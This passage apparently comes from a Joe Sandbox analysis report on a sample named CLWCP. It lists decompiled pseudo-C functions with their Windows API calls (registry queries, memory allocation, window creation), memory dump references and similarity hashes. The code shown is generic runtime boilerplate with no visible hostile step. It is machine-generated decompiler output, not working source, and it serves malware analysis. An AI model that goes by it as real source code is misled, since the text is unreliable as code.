                                  				_t2 = GetWindowLongA(__eax, 0xfffffffc);
                                  				_t5 = _t2;
                                  				_push(_t6); // executed
                                  				L00406604(); // executed
                                  				if(_t2 != L004065DC) {
                                  					return E0041AC28(_t5);
                                  				}
                                  				return _t2;
                                  			}






                                  APIs
                                  • GetWindowLongA.USER32 ref: 0041AD07
                                  • 72E89840.USER32(00000000,00000000,000000FC,?,00000000,00431EAB,00000000,0043309B,00000000,00433282,?,00000000,004332F4), ref: 0041AD0F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: E89840LongWindow
                                  • String ID:
                                  • API String ID: 1839987407-0
                                  • Opcode ID: 5398ce69d566e0b603136df891a1d15438f9ba675af9c0e3f4a9521eff73e161
                                  • Instruction ID: 1a6d1295ad879cc51e45f2f1d25ae6bd91b41d757dadb1a0647e01936bb53e44
                                  • Opcode Fuzzy Hash: 5398ce69d566e0b603136df891a1d15438f9ba675af9c0e3f4a9521eff73e161
                                  • Instruction Fuzzy Hash: 90C0121120653427A521326D2C818EB018C880126D311163BB512A61C3DE6D0D6042DE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406A7C(int __eax, long __edx) {
                                  				void* _t2;
                                  
                                  				_t2 = GlobalAlloc(__eax, __edx); // executed
                                  				GlobalFix(_t2);
                                  				return _t2;
                                  			}





                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Global$Alloc
                                  • String ID:
                                  • API String ID: 2558781224-0
                                  • Opcode ID: 125812dadcd751747e186adb72ec13e1d2cee62e5d1486aefeb6c52e57f55d37
                                  • Instruction ID: c99478ccaa3089254f3f8c0883599ba1b5e243e8dba37db129ac892a5b11e41c
                                  • Opcode Fuzzy Hash: 125812dadcd751747e186adb72ec13e1d2cee62e5d1486aefeb6c52e57f55d37
                                  • Instruction Fuzzy Hash: 839002C4A0030029DC1072B20C1AD3F052D5DD47083C248EE3102B3083983E842000B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040152C(void* __eax, void** __edx) {
                                  				void* _t3;
                                  				void** _t8;
                                  				void* _t11;
                                  				long _t14;
                                  
                                  				_t8 = __edx;
                                  				if(__eax >= 0x100000) {
                                  					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                  				} else {
                                  					_t14 = 0x100000;
                                  				}
                                  				_t8[1] = _t14;
                                  				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                  				_t11 = _t3;
                                  				 *_t8 = _t11;
                                  				if(_t11 != 0) {
                                  					_t3 = E004013E0(0x4705e8, _t8);
                                  					if(_t3 == 0) {
                                  						VirtualFree( *_t8, 0, 0x8000);
                                  						 *_t8 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t3;
                                  			}








                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040183D), ref: 0040155B
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040183D), ref: 00401582
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 46017f76d4ababe246a5a5b49f8afe02733473bca792890391ce7170ae40c2a3
                                  • Instruction ID: 85e4f71e4becb8d36ef98f7be845cf46fd0e324e8ccc196a8376d49f0cc24473
                                  • Opcode Fuzzy Hash: 46017f76d4ababe246a5a5b49f8afe02733473bca792890391ce7170ae40c2a3
                                  • Instruction Fuzzy Hash: 90F0E272B0063027EB20566A4C82B5655949B85B94F144076FE4DFF3D8D2B98C0142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040CE2A(void* __ecx, signed int __edx, void* __eflags, void* __fp0) {
                                  				void* _t4;
                                  				void* _t5;
                                  				void* _t15;
                                  				signed int _t18;
                                  				void* _t23;
                                  
                                  				_t5 = E00403764(_t4, __edx);
                                  				_t18 = __edx;
                                  				_t23 = _t5;
                                  				E0040CEB8(_t23, __ecx, __fp0);
                                  				E00403388(_t18 & 0x000000fc);
                                  				CloseHandle( *(_t23 + 0x10)); // executed
                                  				CloseHandle( *(_t23 + 0x14));
                                  				_t15 = E00403398( *((intOrPtr*)(_t23 + 0x20)));
                                  				if(_t18 > 0) {
                                  					return E0040370C(_t23);
                                  				}
                                  				return _t15;
                                  			}









                                  APIs
                                    • Part of subcall function 0040CEB8: GetCurrentThreadId.KERNEL32 ref: 0040CEC3
                                  • CloseHandle.KERNEL32(?), ref: 0040CE4E
                                  • CloseHandle.KERNEL32(?,?), ref: 0040CE57
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CurrentThread
                                  • String ID:
                                  • API String ID: 1015134532-0
                                  • Opcode ID: a0365eb8f89645a42e544926c51dadebdce79a6919837bb8a60e5c77dfb78149
                                  • Instruction ID: a7db9104fb2c00f2790ae6a06ed29bb2be1d349023e35b880379ab15708ca4ad
                                  • Opcode Fuzzy Hash: a0365eb8f89645a42e544926c51dadebdce79a6919837bb8a60e5c77dfb78149
                                  • Instruction Fuzzy Hash: C3E01AA2300B1097C621BBBEA8C245E66989E4665A304463EB541EF2D2DA3DDE15439D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E0041B228(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi) {
                                  				char _v4;
                                  				char _v8;
                                  				char _v9;
                                  				void* _v16;
                                  				intOrPtr _v117;
                                  				char* _t63;
                                  				signed int _t66;
                                  				char* _t69;
                                  				signed int _t72;
                                  				char* _t75;
                                  				signed int _t78;
                                  				signed char _t98;
                                  				intOrPtr _t111;
                                  				intOrPtr* _t120;
                                  				void* _t123;
                                  
                                  				_pop(_t123);
                                  				 *__eax =  *__eax + __eax;
                                  				_v117 = _v117 + __edx;
                                  				_v4 = 0;
                                  				_t120 = __eax;
                                  				_push(_t123);
                                  				_push(0x41b3c6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t123 + 0xfffffff4;
                                  				E004041B4( &_v4, __edx);
                                  				_t98 = E0041AFC8(_v4);
                                  				if(_t98 == 0) {
                                  					E0040467C( &_v8, 1, 1);
                                  				}
                                  				_v16 = 0;
                                  				_t63 = E004045DC(_v8);
                                  				_t66 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t63, 0, 0x20019,  &_v16); // executed
                                  				_v9 = _t66 == 0;
                                  				if(_v9 == 0) {
                                  					_t69 = E004045DC(_v8);
                                  					_t72 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t69, 0, 0x20009,  &_v16);
                                  					_v9 = _t72 == 0;
                                  					if(_v9 == 0) {
                                  						_t75 = E004045DC(_v8);
                                  						_t78 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t75, 0, 1,  &_v16);
                                  						_v9 = _t78 == 0;
                                  						if(_v9 != 0) {
                                  							 *(_t120 + 0x18) = 1;
                                  							if(((_t78 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
                                  								_push( *((intOrPtr*)(_t120 + 0x10)));
                                  								_push(E0041B3E0);
                                  								_push(_v8);
                                  								E0040449C();
                                  							}
                                  							E0041B0D0(_t120, _v8, _v16);
                                  						}
                                  					} else {
                                  						 *(_t120 + 0x18) = 0x20009;
                                  						if(((_t72 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
                                  							_push( *((intOrPtr*)(_t120 + 0x10)));
                                  							_push(E0041B3E0);
                                  							_push(_v8);
                                  							E0040449C();
                                  						}
                                  						E0041B0D0(_t120, _v8, _v16);
                                  					}
                                  				} else {
                                  					 *(_t120 + 0x18) = 0x20019;
                                  					if(((_t66 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
                                  						_push( *((intOrPtr*)(_t120 + 0x10)));
                                  						_push(E0041B3E0);
                                  						_push(_v8);
                                  						E0040449C();
                                  					}
                                  					E0041B0D0(_t120, _v8, _v16);
                                  				}
                                  				_pop(_t111);
                                  				 *[fs:eax] = _t111;
                                  				_push(E0041B3CD);
                                  				return E0040411C( &_v8);
                                  			}



















                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: d85c03be176bcdc36716843f03fd34529b475baa92fe1d6a31b4ce1bcbad53f5
                                  • Instruction ID: 1f2450826590cab1515ca360b350964bc0a06a1ecc3d316448b2bde7cdf9bc2a
                                  • Opcode Fuzzy Hash: d85c03be176bcdc36716843f03fd34529b475baa92fe1d6a31b4ce1bcbad53f5
                                  • Instruction Fuzzy Hash: 7621C270A04208AFDB12DBA5C852BDEB7F5EB49304F1044BBE810E3692DB799F549788
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E004138D4(void* __eax, struct HINSTANCE__* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t10;
                                  				intOrPtr _t15;
                                  				struct HINSTANCE__* _t20;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				intOrPtr* _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t40;
                                  
                                  				_t38 = _t40;
                                  				_push(_t22);
                                  				_t35 = _t22;
                                  				_t20 = __edx;
                                  				_t32 = __eax;
                                  				if(__edx == 0) {
                                  					_t20 =  *0x470664; // 0x400000
                                  				}
                                  				_t10 = FindResourceA(_t20, E004045DC(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                  				_t43 = _t10;
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_v8 = E004163E8(_t20, 1, 0xa, _t32);
                                  					_push(_t38);
                                  					_push(0x413948);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t40;
                                  					_t15 = E00415ED4(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                  					 *_t35 = _t15;
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(E0041394F);
                                  					return E00403398(_v8);
                                  				}
                                  			}



















                                  APIs
                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 004138F6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: 641d8e5b1ca492e37d8dc89d2752d518b5dd288c22cbfd40209ec55e453b7153
                                  • Instruction ID: 4f055157ae6aa7acff666d98049c619c1a81d90d2bf05d19d25692b164bb8dee
                                  • Opcode Fuzzy Hash: 641d8e5b1ca492e37d8dc89d2752d518b5dd288c22cbfd40209ec55e453b7153
                                  • Instruction Fuzzy Hash: 8001F771304304BFD711EF66DC9299AB7DDDB89714711403BF504DB251DAB99D01D628
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041B4D2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                  				int _v8;
                                  				char _v12;
                                  				char _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				long _t18;
                                  				void* _t26;
                                  				intOrPtr _t30;
                                  				char _t38;
                                  
                                  				_t35 = __ecx;
                                  				_t38 = __edx;
                                  				_t26 = __eax;
                                  				_v8 = 0;
                                  				_t18 = RegQueryValueExA( *(_t26 + 4), E004045DC(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                  				if(_t18 != 0) {
                                  					_v16 = _t38;
                                  					_v12 = 0xb;
                                  					_t30 =  *0x46fdd4; // 0x4109b0
                                  					E0040B928(_t26, _t30, 1, _t35, _t38, 0,  &_v16);
                                  					E00403B64();
                                  				}
                                  				 *_a4 = E0041AFDC(_v8);
                                  				return _a8;
                                  			}















                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041B4FF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 11130073650470f801779401c3d7f3d91b42341ad29b22150650c83aaed25166
                                  • Instruction ID: 7fa46106d3948fbd68e206c0437450774b6a6f74ae9f9a5420089c0b034f225e
                                  • Opcode Fuzzy Hash: 11130073650470f801779401c3d7f3d91b42341ad29b22150650c83aaed25166
                                  • Instruction Fuzzy Hash: 9A012175A00208AFD700DFA9DC81AEAB7ACDB49314F008176F914DB282D6759E04CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041B4D4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                  				int _v8;
                                  				char _v12;
                                  				char _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				long _t18;
                                  				void* _t25;
                                  				intOrPtr _t28;
                                  				char _t33;
                                  
                                  				_t32 = __ecx;
                                  				_t33 = __edx;
                                  				_t25 = __eax;
                                  				_v8 = 0;
                                  				_t18 = RegQueryValueExA( *(_t25 + 4), E004045DC(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                  				if(_t18 != 0) {
                                  					_v16 = _t33;
                                  					_v12 = 0xb;
                                  					_t28 =  *0x46fdd4; // 0x4109b0
                                  					E0040B928(_t25, _t28, 1, _t32, _t33, 0,  &_v16);
                                  					E00403B64();
                                  				}
                                  				 *_a4 = E0041AFDC(_v8);
                                  				return _a8;
                                  			}















                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041B4FF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: c6d0b0f4177d66c064a70513ada52b6b26d5068b8f398f75d542e62470591afa
                                  • Instruction ID: b709256a61fd38dc1cec6e3d4eb20bc9ad8d91630d4d3c6394ca961e675e1c11
                                  • Opcode Fuzzy Hash: c6d0b0f4177d66c064a70513ada52b6b26d5068b8f398f75d542e62470591afa
                                  • Instruction Fuzzy Hash: 54014475A00208AFD700DFA9DC81ADAB7ACDB49314F008177F914DB382D6759E04CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00406AC2(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t31;
                                  				long _t38;
                                  
                                  				_push(_t31);
                                  				_v8 = _t31;
                                  				_t38 = __eax;
                                  				_t13 = E00402B3C();
                                  				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402B2C(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 4ea5385a7fb49de877cea24c14509646f54dc55b59a53c0af84918c32b27f4c7
                                  • Instruction ID: 055c523252b182479b1322842d5a616c723e48f9163be22828002068c565a500
                                  • Opcode Fuzzy Hash: 4ea5385a7fb49de877cea24c14509646f54dc55b59a53c0af84918c32b27f4c7
                                  • Instruction Fuzzy Hash: D3F07FB2700118BF9B80DE9DDD85E9B77ECEB4D264B05412ABA08E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406AC4(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t29;
                                  				long _t32;
                                  
                                  				_v8 = _t29;
                                  				_t32 = __eax;
                                  				_t13 = E00402B3C();
                                  				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402B2C(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: f809e8321112fef6cd52cdc8dabafa63f047bb196829bf56c09a771d002f0ff5
                                  • Instruction ID: eeef6f1da893cc1339d43a719b5e30be1e1af0b80099e00e805a3e993f65ff62
                                  • Opcode Fuzzy Hash: f809e8321112fef6cd52cdc8dabafa63f047bb196829bf56c09a771d002f0ff5
                                  • Instruction Fuzzy Hash: 32F07FB2600118AF8B80DE9DDD85E9B77ECEB4D264B05412ABA08E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00455E44(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                  				char _v8;
                                  				void* _t27;
                                  				intOrPtr _t33;
                                  				intOrPtr _t40;
                                  				char _t41;
                                  
                                  				_push(0);
                                  				_t37 = __edx;
                                  				_t27 = __eax;
                                  				_push(_t40);
                                  				_push(0x455ec6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t40;
                                  				_t41 =  *((char*)(__eax + 0xac));
                                  				if(_t41 == 0) {
                                  					_t7 = _t27 + 0x8c; // 0x8c
                                  					E00404170(_t7, __edx);
                                  				} else {
                                  					E00455DF8(__eax,  &_v8);
                                  					E00404528(_v8, _t37);
                                  					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
                                  						SetWindowTextA( *(_t27 + 0x30), E004045DC(_t37));
                                  						_t6 = _t27 + 0x8c; // 0x8c
                                  						E0040411C(_t6);
                                  					}
                                  				}
                                  				_pop(_t33);
                                  				 *[fs:eax] = _t33;
                                  				_push(E00455ECD);
                                  				return E0040411C( &_v8);
                                  			}









                                  APIs
                                    • Part of subcall function 00455DF8: GetWindowTextA.USER32 ref: 00455E1B
                                  • SetWindowTextA.USER32(?,00000000), ref: 00455E91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: TextWindow
                                  • String ID:
                                  • API String ID: 530164218-0
                                  • Opcode ID: a5a8a5f97e6c3099e6ffdff6fd17be931417818d28b829c888b7f72ab7cb079b
                                  • Instruction ID: 8c2c7cd305171f378c92bbe1b892341fca0d768ae13f23b865104b2b29def0f7
                                  • Opcode Fuzzy Hash: a5a8a5f97e6c3099e6ffdff6fd17be931417818d28b829c888b7f72ab7cb079b
                                  • Instruction Fuzzy Hash: 8F01A770600A04AFD711EB65C857F6A73A89B89705F918077FD00DB693DB7C9E08CA79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406B1C(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                  				long _v8;
                                  				void* _t12;
                                  				struct HWND__* _t22;
                                  				long _t27;
                                  				CHAR* _t30;
                                  
                                  				_v8 = _t27;
                                  				_t30 = __eax;
                                  				_t12 = E00402B3C();
                                  				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E00402B2C(_t12);
                                  				return _t22;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: a32d1e2c77882705ae6a4b95879da80bfa9564b651c5175dfe47f38abb15fb0b
                                  • Instruction ID: 34761e0b611609027b409a2959eeb2aca7fe1dc47977453024b6348bbc10bbac
                                  • Opcode Fuzzy Hash: a32d1e2c77882705ae6a4b95879da80bfa9564b651c5175dfe47f38abb15fb0b
                                  • Instruction Fuzzy Hash: F4F097B2704118BFD740DE9DDD85E9B77ECEB4D264B01412ABA0CE7241D574ED1087A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00441090(void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _t6;
                                  				intOrPtr _t8;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				intOrPtr _t20;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t28;
                                  
                                  				_t25 = __esi;
                                  				_t17 = __ecx;
                                  				_push(_t28);
                                  				_push(0x441116);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t28;
                                  				 *0x470aa8 =  *0x470aa8 - 1;
                                  				if( *0x470aa8 < 0) {
                                  					 *0x470aa4 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                  					_t31 =  *0x470aa4;
                                  					E00440E40(_t16, __edi,  *0x470aa4);
                                  					_t6 =  *0x430190; // 0x4301dc
                                  					E00413560(_t6, _t16, _t17,  *0x470aa4);
                                  					_t8 =  *0x430190; // 0x4301dc
                                  					E00413600(_t8, _t16, _t17, _t31);
                                  					_t21 =  *0x430190; // 0x4301dc
                                  					_t10 =  *0x442454; // 0x4424a0
                                  					E004135AC(_t10, _t16, _t21, __esi, _t31);
                                  					_t22 =  *0x430190; // 0x4301dc
                                  					_t12 =  *0x441120; // 0x44116c
                                  					E004135AC(_t12, _t16, _t22, __esi, _t31);
                                  					_t23 =  *0x430190; // 0x4301dc
                                  					_t14 =  *0x441244; // 0x441290
                                  					E004135AC(_t14, _t16, _t23, _t25, _t31);
                                  				}
                                  				_pop(_t20);
                                  				 *[fs:eax] = _t20;
                                  				_push(0x44111d);
                                  				return 0;
                                  			}
















                                  APIs
                                  • GetVersion.KERNEL32(00000000,00441116), ref: 004410AA
                                    • Part of subcall function 00440E40: GetCurrentProcessId.KERNEL32(?,00000000,00440FB8), ref: 00440E61
                                    • Part of subcall function 00440E40: GlobalAddAtomA.KERNEL32 ref: 00440E94
                                    • Part of subcall function 00440E40: GetCurrentThreadId.KERNEL32 ref: 00440EAF
                                    • Part of subcall function 00440E40: GlobalAddAtomA.KERNEL32 ref: 00440EE5
                                    • Part of subcall function 00440E40: RegisterClipboardFormatA.USER32 ref: 00440EFB
                                    • Part of subcall function 00440E40: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00440F7F
                                    • Part of subcall function 00440E40: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440F90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: c2cabc03203bb3823e33203204505c7b1e48f5680c0b0e354beef33ee09e1c6a
                                  • Instruction ID: b74f1cc5ab12ec1c0557040eb5c0ae4aa8e907eb6d215a0cae93aeab2dc99098
                                  • Opcode Fuzzy Hash: c2cabc03203bb3823e33203204505c7b1e48f5680c0b0e354beef33ee09e1c6a
                                  • Instruction Fuzzy Hash: CBF09674214200AFDB11FF25EC538553765F789709B900136F604C3676C63DEC91CA8C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00408424(signed int __eax, signed int __edx) {
                                  				signed int _t6;
                                  				void* _t14;
